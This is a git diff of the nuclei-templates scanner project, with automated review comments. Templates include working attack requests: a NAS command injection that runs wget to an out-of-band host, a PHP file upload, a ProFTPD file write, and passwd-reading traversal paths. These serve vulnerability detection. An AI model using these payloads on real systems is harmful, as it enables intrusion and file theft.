patch-1
sandeep 2022-01-19 13:25:06 +05:30
commit fd023b42a8
933 changed files with 10014 additions and 4134 deletions

View File

@ -1,6 +1,9 @@
name: 🗒 Templates Stats
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
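Review bot: the `tags: - '*'` trigger runs this stats job on every tag push and `workflow_dispatch:` lets anyone with write access start it by hand; nothing in the file says why stats should regenerate on tags, so a one-line comment above `on:` recording the intent would spare the next reader a trip through the git log.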
@ -49,4 +52,4 @@ jobs:
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
branch: master
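Review bot: `branch: master` hard-codes the push target where `branch: ${{ github.ref }}` followed the triggering ref; for tag-triggered runs that is the right fix, since pushing to a tag ref would fail, but it means a run started by any tag now lands a commit on master. Separately, `uses: ad-m/github-push-action@master` pins the action to a moving branch; pin it to a release tag or commit SHA so the code that receives `secrets.GITHUB_TOKEN` cannot change underneath the workflow.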

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 934 | daffainfo | 366 | cves | 940 | info | 948 | http | 2572 |
| lfi | 393 | dhiyaneshdk | 347 | vulnerabilities | 367 | high | 713 | file | 57 |
| panel | 334 | pikpikcu | 287 | exposed-panels | 333 | medium | 533 | network | 48 |
| xss | 291 | pdteam | 222 | technologies | 231 | critical | 332 | dns | 12 |
| wordpress | 274 | geeknik | 173 | exposures | 196 | low | 170 | | |
| exposure | 254 | dwisiswant0 | 158 | misconfiguration | 168 | | | | |
| rce | 238 | pussycat0x | 97 | token-spray | 143 | | | | |
| tech | 237 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 201 | 0x_akoko | 84 | default-logins | 64 | | | | |
| wp-plugin | 188 | princechaddha | 77 | file | 57 | | | | |
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
**195 directories, 2764 files**.
**203 directories, 3004 files**.
</td>
</tr>
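Review bot: these rows are the auto-generated stats table (the same table appears a second time in another file in this commit), and mixing regenerated numbers into a 933-file commit of hand-edited templates makes the diff hard to review; the stats workflow earlier in this commit exists to push these numbers on its own, so leave the generated files out of manual commits.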

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 934 | daffainfo | 366 | cves | 940 | info | 948 | http | 2572 |
| lfi | 393 | dhiyaneshdk | 347 | vulnerabilities | 367 | high | 713 | file | 57 |
| panel | 334 | pikpikcu | 287 | exposed-panels | 333 | medium | 533 | network | 48 |
| xss | 291 | pdteam | 222 | technologies | 231 | critical | 332 | dns | 12 |
| wordpress | 274 | geeknik | 173 | exposures | 196 | low | 170 | | |
| exposure | 254 | dwisiswant0 | 158 | misconfiguration | 168 | | | | |
| rce | 238 | pussycat0x | 97 | token-spray | 143 | | | | |
| tech | 237 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 201 | 0x_akoko | 84 | default-logins | 64 | | | | |
| wp-plugin | 188 | princechaddha | 77 | file | 57 | | | | |
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |

View File

@ -6,7 +6,7 @@ info:
severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd
tags: xiuno,cnvd,cnvd2019
requests:
- method: GET
@ -14,14 +14,16 @@ requests:
- "{{BaseURL}}/install/"
headers:
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "/view/js/xiuno.js"
- "Choose Language (选择语言)"
part: body
condition: and
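Review bot: requiring both `/view/js/xiuno.js` and `Choose Language (选择语言)` under `condition: and`, together with the status 200 matcher, is a sound reachability check for the installer page, which is exactly the precondition the description names, so `severity: medium` fits. One nit: the `Accept-Encoding: deflate` request header is unexplained; if it is there to keep the body uncompressed for the word matcher, say so in a comment.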

View File

@ -5,7 +5,7 @@ info:
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cvnd,catfishcms
tags: rce,cnvd,catfishcms,cnvd2019
requests:
- method: GET
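Review bot: good catch on the `cvnd` typo in the old tag line; until now a `cnvd` tag filter silently skipped this template. The remaining `reference:` is a bare IP address (`http://112.124.31.29/...`) that can vanish at any time; add the cnvd.org.cn advisory link for CNVD-2019-06255, which the path itself names, as a durable reference.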
@ -19,9 +19,9 @@ requests:
- 200
- type: word
condition: and
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'
condition: and

View File

@ -6,7 +6,7 @@ info:
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
reference: https://www.cnvd.org.cn/flaw/show/2025171
tags: xunchi,lfi,cnvd
tags: xunchi,lfi,cnvd,cnvd2020
requests:
- method: GET
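Review bot: the description calls the product "Xunyou cms" while the tag line says `xunchi`; one of them is wrong, so confirm the vendor name before adding the year tag and align `description:` and `tags:`. The reference `https://www.cnvd.org.cn/flaw/show/2025171` also uses a numeric path rather than the CNVD id form the neighbouring templates cite.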
@ -18,9 +18,10 @@ requests:
- type: status
status:
- 200
- type: word
part: body
words:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
part: body
condition: and
condition: and
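Review bot: two `condition: and` lines close this hunk, which reads as one being removed from under the `words:` list and one being added at matcher level; since the rendered diff drops indentation, confirm that exactly one `condition: and` survives as a sibling of `words:` (not nested inside the list) by running nuclei's `-validate` pass on the file.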

View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: low
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
tags: ruijie,default-login,cnvd
tags: ruijie,default-login,cnvd,cnvd2020
requests:
- method: POST
@ -17,12 +17,11 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Level was: LEVEL15"
- "/WEB_VMS/LEVEL15/"
part: body
condition: and
- type: status

View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi,cnvd
tags: lfi,cnvd,cnvd2020,seeyon
requests:
- method: GET
@ -17,13 +17,15 @@ requests:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/x-msdownload"
condition: and
part: header
- type: word
part: body
words:
- "ctpDataSource.password"
condition: and
part: body
condition: and
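Review bot: `condition: and` on the header matcher is a no-op, because its `words:` list holds the single entry `application/x-msdownload`; drop it there and keep `condition: and` only on matchers with more than one word. Moving `part:` above `words:` in both matchers is fine, just keep that order consistent across the file.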

View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: critical
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
tags: weiphp,lfi,cnvd
tags: weiphp,lfi,cnvd,cnvd2020
requests:
- raw:
@ -34,9 +34,9 @@ requests:
matchers:
- type: word
part: body
words:
- https://weiphp.cn
- WeiPHP
- DB_PREFIX
condition: and
part: body

View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: high
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
tags: config,exposure,cnvd
tags: config,exposure,cnvd,cnvd2021
requests:
- method: GET
@ -14,7 +14,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "<username>(.*?)</username>"
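Review bot: the regex `<username>(.*?)</username>` also matches an empty `<username></username>` element, so a blank configuration stub will fire this high-severity template; `<username>(.+?)</username>` requires at least one character. The hunk drops one line (`-14,7 +14,6`) that is not visible here, presumably a `part:` key; if it was `part: body`, that is the default for HTTP matchers and removing it is harmless.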

View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
tags: shopxo,lfi
tags: shopxo,lfi,cnvd,cnvd2021
requests:
- raw:
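Review bot: the tag line gains `cnvd,cnvd2021`, but the only reference is a WeChat article (`mp.weixin.qq.com`), so nothing in the file ties this template to a CNVD id; add the cnvd.org.cn advisory link so the new tags are backed by a source.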
@ -16,7 +16,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"

View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
tags: ruijie,disclosure,cnvd
tags: ruijie,disclosure,cnvd,cnvd2021
requests:
- method: GET
@ -16,12 +16,11 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<userauth>"
- "<password>"
part: body
condition: and
- type: status

View File

@ -7,7 +7,7 @@ info:
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
tags: beanshell,rce,cnvd,cnvd2021
requests:
- raw:
@ -40,4 +40,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -0,0 +1,38 @@
id: CNVD-2021-49104
info:
name: Pan Micro E-office File Uploads
author: pikpikcu
severity: critical
reference: https://chowdera.com/2021/12/202112200602130067.html
tags: pan,micro,cnvd,cnvd2021
requests:
- raw:
- |
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
Content-Type: image/jpeg
<?php echo md5('CNVD-2021-49104');?>
--e64bdf16c554bbc109cecef6451c26a4--
- |
GET /images/logo/logo-eoffice.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "94d01a2324ce38a2e29a629c54190f67"
- type: status
status:
- 200
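Review bot: this template leaves a PHP file on the target: the first request uploads `{{randstr}}.php` with a `<?php echo md5(...)?>` body and the second fetches the fixed path `/images/logo/logo-eoffice.php`, so detection relies on the server renaming the upload to the logo path (which also overwrites the site logo), and nothing removes the file afterwards. State that the check is intrusive in `description:` and explain the rename assumption in a comment. Also `tags: pan,micro` splits the vendor into two meaningless tags; use a single `eoffice` or `pan-micro` tag, and add the `classification:` block the other new templates in this commit carry.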

contributors.json (new file, 1322 lines)

File diff suppressed because it is too large

View File

@ -18,7 +18,8 @@ info:
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
- "{{Host}}:22"
matchers:
- type: word
words:
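Review bot: replacing `"{{Hostname}}:22"` with `"{{Host}}:22"` is the right fix: `{{Hostname}}` already carries the port when the input supplied one, so the old entry could expand to `host:port:22`, whereas `{{Host}}` is the bare host. The first entry, `"{{Hostname}}"`, still covers inputs that bring their own port.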

View File

@ -5,7 +5,7 @@ info:
author: dhiyaneshDK
severity: medium
description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
tags: cve,cve2007,xss,pgadmin
tags: cve,cve2007,xss,pgadmin,phppgadmin
reference: https://www.exploit-db.com/exploits/30090
metadata:
shodan-query: 'http.title:"phpPgAdmin"'

View File

@ -8,7 +8,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
author: geeknik
severity: high
tags: nweb2fax,lfi,cve,cve2008
tags: nweb2fax,lfi,cve,cve2008,traversal
requests:
- method: GET

View File

@ -9,7 +9,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/16154
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
tags: cve,cve2009,horde,lfi
tags: cve,cve2009,horde,lfi,traversal
requests:
- method: GET

View File

@ -6,7 +6,7 @@ info:
severity: high
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference: https://www.exploit-db.com/exploits/32954
tags: cve,cve2009,iot,lfi
tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
requests:
- method: GET

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2009,joomla,lfi
tags: cve,cve2009,joomla,lfi,photo
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -8,7 +8,7 @@ info:
reference: |
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2009,joomla,lfi
tags: cve,cve2009,joomla,lfi,nexus
requests:
- method: GET
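Review bot: `reference: |` is a YAML literal block scalar, so the two `- https://...` lines below it become one multi-line string rather than a list of references; remove the `|` so they parse as list items, as the plain `reference:` list in the preceding template does.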
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,plugin
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,plugin
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,graph
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,status
requests:
- method: GET

View File

@ -8,7 +8,7 @@ info:
reference: |
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,photo
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.securityfocus.com/bid/40550/info
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
tags: cve,cve2010,iot,lfi
tags: cve,cve2010,iot,lfi,motorola
requests:
- method: GET

View File

@ -8,7 +8,7 @@ info:
reference:
- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
- http://www.adobe.com/support/security/bulletins/apsb10-18.html
tags: cve,cve2010,coldfusion,lfi
tags: cve,cve2010,coldfusion,lfi,adobe
requests:
- method: GET

View File

@ -8,7 +8,7 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505
tags: cve,cve2010,iot,lfi
tags: cve,cve2010,iot,lfi,camera
requests:
- method: GET

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/15643
- https://www.cvedetails.com/cve/CVE-2010-4282
tags: cve,cve2010,lfi,joomla
tags: cve,cve2010,lfi,joomla,phpshowtime
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -6,7 +6,7 @@ info:
severity: critical
description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
tags: cve,cve2012,apache,rce,struts
tags: cve,cve2012,apache,rce,struts,java
requests:
- method: GET
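Review bot: the only `reference:` is a CSDN blog post; add the Apache Struts security bulletin covering the CookieInterceptor issue that `description:` quotes, so the template cites the vendor advisory alongside the write-up. The `java` tag addition is fine.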
@ -22,4 +22,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -8,7 +8,7 @@ info:
reference:
- https://packetstormsecurity.com/files/108631/
- https://www.cvedetails.com/cve/CVE-2012-0896
tags: cve,cve2012,lfi,wordpress,wp-plugin
tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal
requests:
- method: GET

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr
tags: cve,cve2012,lfi,openemr,traversal
requests:
- method: GET

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/36873
- https://www.cvedetails.com/cve/CVE-2012-1226
tags: cve,cve2012,lfi
tags: cve,cve2012,lfi,dolibarr,traversal
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/37034
- https://www.cvedetails.com/cve/CVE-2012-4878
tags: cve,cve2012,lfi
tags: cve,cve2012,lfi,traversal
requests:
- method: GET

View File

@ -6,7 +6,7 @@ info:
severity: high
description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
reference: https://www.exploit-db.com/exploits/37996
tags: cve,cve2012,axigen,lfi
tags: cve,cve2012,axigen,lfi,mail
requests:
- method: GET
@ -22,4 +22,4 @@ requests:
- "bit app support"
- "fonts"
- "extensions"
condition: and
condition: and

View File

@ -6,7 +6,7 @@ info:
severity: critical
description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
reference: http://struts.apache.org/development/2.x/docs/s2-012.html
tags: cve,cve2013,apache,rce,struts
tags: cve,cve2013,apache,rce,struts,ognl
requests:
- method: POST

View File

@ -6,7 +6,7 @@ info:
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code.
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
tags: cve,cve2013,rce,struts,apache
tags: cve,cve2013,rce,struts,apache,ognl
requests:
- raw:

View File

@ -6,7 +6,7 @@ info:
reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
author: geeknik
severity: critical
tags: cve,cve2014,sqli,lighttpd
tags: cve,cve2014,sqli,lighttpd,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

View File

@ -6,7 +6,7 @@ info:
severity: high
description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
reference: https://www.exploit-db.com/exploits/38488
tags: cve,cve2014,lfi,router
tags: cve,cve2014,lfi,router,firmware,traversal
requests:
- method: GET

View File

@ -9,7 +9,7 @@ info:
reference:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
- https://www.elastic.co/blog/logstash-1-4-3-released
tags: cve,cve2014,elastic,rce
tags: cve,cve2014,elastic,rce,elasticsearch
requests:
- raw:

View File

@ -0,0 +1,35 @@
id: CVE-2014-3206
info:
name: Seagate BlackArmor NAS - Command Injection
author: gy741
severity: critical
description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3206
- https://www.exploit-db.com/exploits/33159
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2014-3206
cwe-id: CWE-20
tags: cve,cve2014,seagate,rce
requests:
- raw:
- |
GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
Accept: */*
unsafe: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
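Review bot: the CVSS vector and score disagree: `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` scores 7.8, not `9.80`, and a remote unauthenticated command injection (per `description:`) should carry `AV:N/PR:N`, which does give 9.8. `cwe-id: CWE-20` (improper input validation) is the generic class; CWE-78 (OS command injection), as the Dreambox template later in this commit uses, is the specific one. `unsafe: true` is needed because the raw request lines contain unencoded spaces and `;`; a comment saying so would help.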

View File

@ -7,7 +7,7 @@ info:
reference: |
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
tags: cve,cve2014,wordpress,wp-plugin,xss
tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
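Review bot: `reference: |` turns the two `- https://...` entries into a single literal string instead of a list; drop the `|` so the wpscan and NVD links parse as list items.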
@ -34,4 +34,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -7,7 +7,7 @@ info:
reference: |
- https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
- https://nvd.nist.gov/vuln/detail/CVE-2014-4561
tags: cve,cve2014,wordpress,wp-plugin,xss
tags: cve,cve2014,wordpress,wp-plugin,xss,weather
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -34,4 +34,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -8,7 +8,7 @@ info:
reference: |
- https://www.exploit-db.com/exploits/39351
- https://www.cvedetails.com/cve/CVE-2014-5111
tags: cve,cve2014,lfi
tags: cve,cve2014,lfi,trixbox
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -21,8 +21,8 @@ requests:
POST /webadmin/auth/verification.php HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: {{BaseURL}}/webadmin/start/
login=branding&password=branding&Submit=Login
matchers-condition: and

View File

@ -8,7 +8,7 @@ info:
reference:
- https://blog.csdn.net/JiangBuLiu/article/details/94457980
- http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/
tags: cve,cve2015,elastic,rce
tags: cve,cve2015,elastic,rce,elasticsearch
requests:
- raw:

View File

@ -13,7 +13,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-1503
cwe-id: CWE-200
tags: cve,cve2015,icewarp,lfi
tags: cve,cve2015,icewarp,lfi,mail
requests:
- method: GET

View File

@ -30,4 +30,4 @@ requests:
- type: word
words:
- "text/html"
part: header
part: header

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
tags: cve,cve2015,lfi,magento,magmi
tags: cve,cve2015,lfi,magento,magmi,plugin
requests:
- method: GET

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
tags: cve,cve2015,magento,magmi,xss
tags: cve,cve2015,magento,magmi,xss,plugin
requests:
- method: GET

View File

@ -6,7 +6,7 @@ info:
severity: high
reference: https://github.com/t0kx/exploit-CVE-2015-3306
description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
tags: cve,cve2015,ftp,rce,network
tags: cve,cve2015,ftp,rce,network,proftpd
network:
- inputs:
@ -17,13 +17,14 @@ network:
- data: "site cpfr /tmp/.{{randstr}}\r\n"
read: 1024
- data: "site cpto /var/www/html/{{randstr}}\r\n"
host:
- "{{Hostname}}:21"
- "{{Hostname}}"
- "{{Host}}:21"
read-size: 1024
matchers:
- type: word
part: raw
words:
- "Copy successful"
part: raw
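Review bot: the `site cpto /var/www/html/{{randstr}}` step writes a file into the target's web root and nothing removes it, so this network check is intrusive and `description:` should say so. The `{{Hostname}}:21` to `{{Host}}:21` change is correct, since `{{Hostname}}` may already include a port.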

View File

@ -6,7 +6,7 @@ info:
severity: high
description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
reference: https://www.exploit-db.com/exploits/37054/
tags: cve,cve2015,elastic,lfi
tags: cve,cve2015,elastic,lfi,elasticsearch,plugin
requests:
- method: GET

View File

@ -13,7 +13,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
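Review bot: the old path `{{BaseURL}/pages/setup.php...` had an unbalanced `{{BaseURL}` placeholder, so the literal text went out on the wire and the template could never match; the fix is correct. A CI lint that checks `{{...}}` balance in every path would catch this class of typo before merge.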

View File

@ -0,0 +1,52 @@
id: CVE-2015-5531
info:
name: ElasticSearch directory traversal vulnerability (CVE-2015-5531)
author: princechaddha
severity: high
description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
reference:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531
- https://nvd.nist.gov/vuln/detail/CVE-2015-5531
tags: cve,cve2015,elasticsearch
requests:
- raw:
- |
PUT /_snapshot/test HTTP/1.1
Host: {{Hostname}}
{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test"
}
}
- |
PUT /_snapshot/test2 HTTP/1.1
Host: {{Hostname}}
{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
}
}
- |
GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ElasticsearchParseException'
- 'Failed to derive xcontent from'
- '114, 111, 111, 116, 58'
condition: and
- type: status
status:
- 400
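Review bot: the first two requests register snapshot repositories `test` and `test2` on the target and nothing deletes them, so this check changes cluster state; mark it intrusive in `description:` and explain the `114, 111, 111, 116, 58` match (the decimal bytes of `root:` echoed back inside the parse error) in a comment, since it is opaque as written. `tags: cve,cve2015,elasticsearch` also drops the `elastic`, `lfi` and `plugin`/`traversal` tags the sibling Elasticsearch traversal template in this commit uses, and the `classification:` block is missing.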

View File

@ -9,7 +9,7 @@ info:
- https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
